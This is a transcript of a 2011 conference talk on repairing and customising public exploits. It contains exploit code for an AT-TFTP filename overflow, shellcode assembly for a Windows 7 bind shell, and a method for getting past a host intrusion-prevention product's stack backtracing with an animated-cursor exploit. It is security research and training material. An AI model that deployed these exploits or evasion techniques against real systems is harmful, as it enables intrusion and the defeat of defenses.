customizing public exploits
DESCRIPTION
Peter Gara-Tarnoczi's presentation on Hacktivity 2011 ConferenceTRANSCRIPT
CUSTOMIZING PUBLIC EXPLOITSCASE STUDIES
Hacktivity 2011 – Péter Gara-Tarnóczi
Previously on ...: Offsec PWB + Hacktivity 2009
Prerequisites: stack buffer overflow + Windows
shellcodes + script languages + x86 Assembly
Introduction
Inspiration & Idea & Sources
Several exploits that I could get from the Internet didn’t work when I tested on vulnerable systems. I needed to modify their code to hack those systems successfully.
Some exploits were accidentally buggy or intentionally limited, others supported different versions of Windows except for that one I had.
I realized that I could categorize problems and had found cases for those categories. I thought that I would make a presentation based on case studies to introduce some of them.
Two information sources provided material for my research: Lab practices of Offensive Security’s Penetration Testing with BackTrack
course
My own presentation, Windows Shellcodes in Malware, on Hacktivity 2009
Some of Problem Categories
Buggy codes: they work only if special conditions
meet. I think they are created debugging in one
environment without the deep knowledge of
vulnerability details.
Portability problems: exploits work on different
operating system versions apart from that one you
test on.
Security evasion: code needs to evade a line of
defense.
Expected knowledge
Required:
Solid knowledge about stack buffer overflow exploits
Basic knowledge about shellcodes
Advantage:
Practical knowledge about x86 Assembly
Basic knowledge about script languages (Perl, Python,
Ruby)
AT-TFTP Server Long Filename Buffer Overflow
CVE-2006-6184
Exploits: Cervini , qnix , Webster ()
Case Study I: Buggy Exploits
CS1: AT-TFTP Server Long Filename BO
2006: Liu Qixu and Zhang Yuqing developed a fuzzer to find overflows in free TFTP applications.
Qixu announced a stack buffer overflow vulnerability in Allied Telesyn TFTP Server version 1.9 on Bugtraq list.
2007: they published results of their research in a paper. Its title was TFTP Vulnerability Exploiting Technique Based on Fuzzing, abstract was also English, other text was Chinese.
Official source: http://en.cnki.com.cn/Article_en/CJFDTOTAL-JSJC200720051.htm
CS1: Protocol Basics
TFTP clients can read (GET) a file from and write
(PUT) a file to a TFTP server.
GET command: 00 01 [fname] 00 [tmode] 00
PUT command: 00 02 [fname] 00 [tmode] 00
AT-TFTP 1.9 handles filename properly processing
network packets but it makes a mistake when it
generates a log entry.
CS1: Ordinary Log Entries
CS1: Vulnerability
Logging method uses a fix-sized (256 bytes) local variable to store an entry (without date and time).
It executes the following type of C instruction: wvsprintf(buffer,”%s requested to %s file %s in format %s\r\n”,clientip,operation,fname,tmode)clientip: e.g. 192.168.1.1operation: read or writefname: filenametmode: e.g. netascii
An attacker can overflow "buffer" sending a long filename.
CS1: Liu Qixu’s DoS Exploit (Python)
import socket
import sys
host = '192.168.1.11'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))
CS1: Controlled Exploitability
CS1: Execution Redirection
Filename has to start with attacker’s code
(read/write packet has limited size)
We need to jump based on content of [return
address + 4 + 0x28],
we should find a call/jmp [esp+0x28] instruction or
we should put add esp,0x28 and ret instructions (83 c4
28 c3) behind the return address in the stack and find
a call/jmp esp instruction.
CS1: Shellcode Length Calculation
Buffer + EBP 256 + 4 == 260 bytes
[clientip] requested to write file [fname] ...
[len____1]1234567890123456789012345[len_2]
length(clientip)+25+length(fname to return addr) ==
260 length(fname to return addr) == 260 - 25 -
length(clientip)
maximum of length(clientip) == 15
length(fname to return addr) == length (NOPs +
shellcode) length(shellcode) = 260 - 25 - 15 = 220
length(clientip) == 260 - 25 - length(NOPs + shellcode)
CS1: Jacopo Cervini’s Exploit (Perl)
$pad = "\x90"x63;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164
Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "...";
$eip="\xf4\xf5\xe3\x75"; #call [ESP+28] in IMM32.dll on win2k Server
SP4 Italian
$mode = "netascii";
$exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0" . $mode . "\0";
length(clientip) == 260 - 25 - (63 + 164) == 8
e.g. 10.1.1.1 10.1.1.2
CS1: qnix’s Exploit (Python)
nops_number1=23-len(host)
nops1 = "\x90"*nops_number1
nops_number2 = 210 - len(shellcode)
nops2 = "\x90"*nops_number2
buffer = "\x00\x02" + nops1 + nops2 + shellcode + return_address + esp + "\x00" + "netascii" + "\x00"
length(clientip) == 260 - 25 - length(NOPs + shellcode) == 235 - (23 - length(serverip) + 210 -length(shellcode) + length(shellcode)) == 235 - 23 + length(serverip) - 210 == length(serverip) + 2
e.g. 192.168.1.101 192.168.1.1
CS1: Bugs in Previous Exploits
Cervini: it uses constant
length of (NOPs +
shellcode) fixes
length of clientip
qnix: it uses wrong
formula, two
modifications needed
23 25
serverip clientip
CS1: Patrick Webster’s Exploit (Ruby)
'Payload' =>
{
'Space' => 210,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
...
sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
sploit << payload.encoded
sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it.
sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn
sploit << "\x00" + "netascii" + "\x00"
This Metasploit code uses right formula but there may be problem with one of the return addresses
CS1: Return Addresses of the Exploit
Some contributors extended the list of return addresses in Webster’s exploit
'Targets' =>
[
# Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24
[ 'Windows NT SP4 English', { 'Ret' => 0x702ea6f7 } ],
...
[ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],
[ 'Windows XP SP3 English', { 'Ret' => 0x7e429353 } ], # ret by c0re
[ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert
[ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear
],
CS1: Problem of Return Addresses
Right RAs
Win2k3 SP0
w/o hotfixes
0x77fb8bab
Win2k3 SP1
w/o hotfixes
0x7c86fed3
I think that guy simply missed right SP
level of Windows 2003.
CS1: AT-TFTP Metasploit Demo
Small Portable Bind Shellcode on Windows 7
Original code: Stuttard, Extended code: SkyLined,
Windows 7 Professional compatible code: GTP
Case Study II: Portability
CS2: Main Elements of Win Shellcodes
Decoding routine (if encoding is needed to eliminate bad chars)
Calculating memory address of system functions
Using hard-coded addresses is not portable
Starting with search of kernel32.dll location is much better Byte sequence search (obsolete)
SEH-based (rare but remarkable)
PEB-based (usual)
Searching address of GetProcAddress and LoadLibraryA calling them as much as it needed and/or
Searching addresses by proper library and function hashes
Calling system functions in expected order
CS2: PEB Technique in Windows 7
before Windows 7
mov eax, fs:[30h]
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
before and on Windows 7
xor ecx, ecx
mov eax, fs:[ecx+30h]
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
next_module:
mov ebp, [esi+08h]
mov edi, [esi+20h]
mov esi, [esi]
cmp [edi+12*2], cl
jnz next_module
CS2: Small Portable Win Shellcode
2005: Dafydd Stuttard created a portable bind shellcode for Windows. Its size was 191 bytes. He wrote an article, Writing Small Shellcode, to present the logic behind his code.
2009: Berend-Jan Wever (SkyLined) modified Stuttard’s shellcode to improve it. One of the relevant improvements was Windows 7 compatibility. Size of shellcode – after some optimization – was 211 bytes.
2011: I checked SkyLined’s code building it into an exploit and experienced that it wasn’t compatible to Windows 7 Professional.
CS2: Reducing Hashsize
Windows shellcodes calculate memory addresses of system functions using a simple hash algorithm. It typically generates 4-byte hashes.
Stuttard refined an important rule of hashing method:
Basic requirement: „It avoids collisions within each library for the specific functions we need to locate.”
Stuttard’s rule: „We can tolerate hash collisions in the functions we need to locate, provided that we iterate through the exported functions in a defined sequence, and the correct function is the first match against each of our hashes.”
Result: Stuttard (and later SkyLined) used 1-byte hashes.
CS2: Hashing Methods
Stuttard
xor edi, edi
next_function_loop:
inc edi
mov esi, [ebx + edi * 4]
add esi, ebp
cdq
hash_loop:
lodsb
xor al, 0x71
sub dl, al
cmp al, 0x71
jne hash_loop
cmp dl, [esp + 0x1c]
jnz next_function_loop
SkyLined
xor edx, edx
next_function_loop:
inc edx
mov esi, [ecx + edx * 4]
add esi, ebp
mov ah, hash_start_value
hash_loop:
lodsb
xor al, hash_xor_value
sub ah, al
cmp al, hash_xor_value
jne hash_loop
cmp ah, [edi]
jnz next_function_loop
CS2: Hashing limitations
1-byte hash several collisions
SkyLined generalized the hashing method using two parameters (hash_start_value and hash_xor_value) but made a restriction in order to reduce size of shellcode. He fixed the ‘w’ character, part of ‘ws2_32’ string, as the hash of ‘accept’ function.
This restriction creates dependency between hash_start_value and hash_xor_value.
If you choose a XOR value, only one START value is correct. SkyLined used XOR value: 0x71 START value: 0x36 hash(‘accept’) == 0x77 == ‘w’
CS2: Necessary system functions
kernel32.dll
CreateProcessA 0xb7
LoadLibraryA 0x8f
ws2_32.dll
WSAStartup 0x09
WSASocketA 0x98
bind 0x66
listen 0x56
accept 0x77
CS2: Problem in SkyLined’s code
0xb7
CreateProcessA
GetModuleHandleExA
GetNumaProcessorNodeEx
TryAcquireSRWLockShared
UnregisterConsoleIME
0x8f
BaseCheckAppcompatCacheEx
LoadLibraryA
UnregisterWaitEx
ZombifyActCtx
BaseCheckAppcompatCacheEx is not in kernel32.dll on
Win7 Release Candidate
is in kernel32.dll on
Win7 Beta and
Win7 Professional Release
CS2: Right Parameter Search
I developed two simple Python scripts
1st script calculated hash of system functions belong to
a dll file
2nd script calculated hash_start_value based on an
input hash_xor_value and the ‘accept’ restriction
I found a few good values that allowed to
CreateProcessA and LoadLibraryA be top functions
in their own list.
Unfortunately, ws2_32 caused another problem...
CS2: Other Params (s:0xb7, x:0xf0)
0xb3
CreateProcessA
CreateSymbolicLinkTransactedW
GetNumaProcessorNodeEx
GetSystemFileCacheSize
IsValidCodePage
LoadAppInitDlls
QueryThreadpoolStackInformation
0x91
LoadLibraryA
LoadStringBaseExW
LocalAlloc
0x92
WSAConnect
WSARecvDisconnect
WSASocketA
0x09
WSAStartup
WSCInstallNameSpaceEx
0x6a
bind
0x58
listen
0x77
accept
CS2: Problem Solution
The only problem is the position of WSASocketA.
Why should we use WSASocketA if we have the
opportunity to use WSASocketW instead?
The ASCII and the Unicode versions of WSASocket
are functionally equal and there are no differences
between the input parameters.
0x9c
WSASocketW
CS2: Code Modification
hash_xor_value equ 0xF0
hash_start_value equ 0xB7
hash_kernel32_CreateProcessA equ 0xB3
hash_kernel32_LoadLibraryA equ 0x91
hash_ws2_32_WSAStartup equ 0x09
hash_ws2_32_WSASocketA equ 0x9C
hash_ws2_32_bind equ 0x6A
hash_ws2_32_listen equ 0x58
hash_ws2_32_accept equ 0x77
IBM ISS Buffer Overflow Exploit Prevention
Animated Cursor Buffer Overflow (CVE-2007-0038)
Exploits: asus.tw , Metasploit , GTP I , GTP II
Case Study III: HIPS evasion
CS3: IBM ISS HIPS Technology
This HIPS has separated network and application
defense functionality.
Both of them contains three different layers:
Network defense (firewall, classic IPS, BOEP)
Application defense (traditional AV, VPS, application
control)
I deal with „last line of network defense”, Buffer
Overflow Exploit Prevention, in this case.
I’d like to demonstrate how I can evade BOEP.
CS3: BOEP
„... IPS agent monitors system calls commonly used by malicious code.”
„By watching the use of Stack and Heap system memory, the agent identifies when a buffer overflow has succeeded andprevents the attack’s payload from running.”
These two sentences are the base of BOEP technology in the mentioned HIPS. Running a rootkit detector application I realized that HIPS hooked three kernel implemented functions:
NtCreateFile
NtCreateProcess
NtCreateProcessEx
CS3: Concept vs. Implementation
Simple Evasion: exploiting a vulnerability by
evasion of the concept, e.g. shellcode execution
from another (no stack, no heap) memory area.
Case Study I: code runs on data segment.
It was tested and really evaded the HIPS.
I would have liked to know whether I could create a
code that avoid detection by exploiting an
implementation bug.
CS3: Article about BOEP Evasion
Jamie Butler, Anonymous I and Anonymous II wrote an article which was published in Phrack magazine No. 62 in 2004. Its title was Bypassing 3rd Party Windows Buffer Overflow Protection.
This article contained details about stack backtracing, kernel hooks evasion and userland hooks evasion.
„Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests...”
„The existing commercial BOPT's kernel components rely entirely on stack backtracing to detect shellcode execution. Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism.”
CS3: Standard function entries
call func1
...
func1:
push ebp
mov ebp, esp ; ebp points to the top of the stack
...
call func2
...
func2:
push ebp ; saves top of the previous stack frame
mov ebp, esp ; ebp points to the top of the stack
...
CS3: Stack Backtracing
CS3: Vulnerability for Test
Animated Cursor Buffer Overflow (CVE-2007-0038)
It was a stack buffer overflow vulnerability.
Some specialties:
Existing exploits didn’t load the shellcode directly into the stack.
Content of the ANI file was loaded to the memory as a mapped file. Smart overwriting of the return address caused execution flow redirection to the shellcode placed on that memory area.
Since that memory area was read-only and shellcode used write operations locally, that code contained a routine to copy relevant code to the heap (asus.tw and other online exploits) or the stack (Metasploit).
I configured classic IPS component of the HIPS to ignore ANI header overflow and ANI ratenumber DoS events.
CS3: Vulnerability & Exploit
CS3: Exploits for Test
I modified asus.tw exploit a bit (but not on a bit)
poc.ani (ASUS)
I used the ANI exploit of Metasploit
ani_loadimage_chunksize script (Metasploit)
I created a new exploit that loaded the shellcode
into the stack in a direct way poc2.ani (GTP I)
I modified previous exploit (poc2.ani) that evaded
BOEP successfully poc3.ani (GTP II)
CS3: 1st Test
Test exploit
ASUS
System calls
GlobalAlloc
LoadLibraryA
URLDownloadToCacheFileA
CreateProcessA
CS3: 2nd Test
Test exploit
Metasploit
System calls
GetProcAddress
LoadLibraryA
GetSystemDirectoryA
URLDownloadToFileA
WinExec
ExitThread
CS3: Loganalysis of 2nd Test
0013e087: call [kernel32.dll]WinExec
77e69a00: call [kernel32.dll]CreateProcessInternalA
77e78b32: call [kernel32.dll]CreateProcessInternalW
77e526fc: call [ntdll.dll]ZwCreateProcessEx
77f4254d: call 7ffe0300
7ffe0302: sysenter
CS3: My Stack Exploit
Basic idea: if you choose a bigger ANIH length, you will
be able to load your shellcode directly into the stack.
Be careful! Some instructions in the vulnerable user32.dll
overwrite two bytes of the shellcode in the stack. These
two bytes at a fix (independent on the shellcode)
position, so that I should insert a short JMP instruction
with a few NOPs to this part of the shellcode.
I used standard windows/download_exec shellcode of
Metasploit without its XOR encoding.
CS3: 3rd Test
Test exploit
GTP I
System calls
GetProcAddress
LoadLibraryA
GetSystemDirectoryA
URLDownloadToFileA
WinExec
ExitThread
CS3: NtCreateProcessEx???
Did you spot an oddity in the result of these tests?
HIPS detected BOEP events in all tests but ...
only at NtCreateProcessEx after URLDownloadTo(Cache)FileA created a new file in the system...
Since URLDownloadTo(Cache)FileA calls CreateFileA to create a new file, and ... CreateFileA CreateFileW ZwCreateFile NtCreateFile, HIPS should detect a BOEP event, but it misses.
URLDownloadTo(Cache)FileA contains several inner call before reaching NtCreateFile. Stack backtracing ceases before reaching original caller.
„Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing.” – Phrack No. 62
CS3: Non-standard function entries
Some functions don’t save EBP in the stack.
Stack Backtracing can handle this behavior if the value in EBP is not altered by the program code and is stored in the stack later.
The result is jumping over some intermediate stack frames and the method finds an earlier one in that case.
„Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead.” –Phrack No. 62
This is a real problem when a security software uses Stack Backtracing. Stack stores a general value executing „push ebp”.
CS3: My Winner Stack Exploit
Basic idea:choose another execution function that
has more complicated calling sequence!
[Shell32.dll]ShellExecuteA seemed to be a good
choice.
I used following parameterized instruction: ShellExecuteA(null,"open",<fname>,null,null,null)
CS3: Stack Backtracing Failure
NtCreateProcessEx ZwCreateProcessEx
CreateProcessInternalW CreateProcessW
Shell32.773955E0 Shell32.773954D5 (no
saved EBP!) Shell32.77395000 (no saved
EBP!) Shell32.77394F03 Shell32.77395053
ShellExecuteExW ShellExecuteExA
ShellExecuteA
Stack Backtracing terminates at call of
CreateProcessW in shell32.dll.
CS3: 4th Test
Test exploit
GTP II
System calls
GetProcAddress
LoadLibraryA
GetSystemDirectoryA
URLDownloadToFileA
ShellExecuteA
ExitThread
THANK YOU FOR YOUR INTEREST!
cm[dot]peter[dot]gara[at]gmail[dot]com